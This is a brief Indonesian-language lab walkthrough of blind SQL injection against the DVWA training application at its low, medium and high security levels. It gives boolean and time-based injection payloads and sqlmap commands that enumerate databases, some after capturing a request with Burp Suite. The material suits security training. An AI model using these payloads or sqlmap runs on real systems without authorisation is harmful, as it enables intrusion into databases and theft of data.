Blind SQL Injection muncul ketika aplikasi rentan terhadap SQL Injection, tetapi respons HTTP-nya tidak berisi hasil kueri SQL yang relevan atau detail kesalahan basis data apa pun.
1' and length(database())=4#
- Menemukan database dengan tool sqlmap
sqlmap -u "http://<IP_Server>/DVWA/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=hash; security=low" --dbs
- Lakukan injeksi pada tag
<option>menggunakan inspect element di browser
1 and sleep(5)
- Kembali ke halaman seperti semula, tangkap request pada halaman SQL Injection (Blind) dengan Security Medium menggunakan tool Burp Suite. Klik kanan pada kolom Request dan pilih Save Item
- Lakukan SQL Injection pada request dengan tool sqlmap
sqlmap -r nama_file_request --dbs
sqlmap -u "http://<IP_Server>/DVWA/vulnerabilities/sqli_blind/?id=1" --cookie="PHPSESSID=hash; security=high" --dbs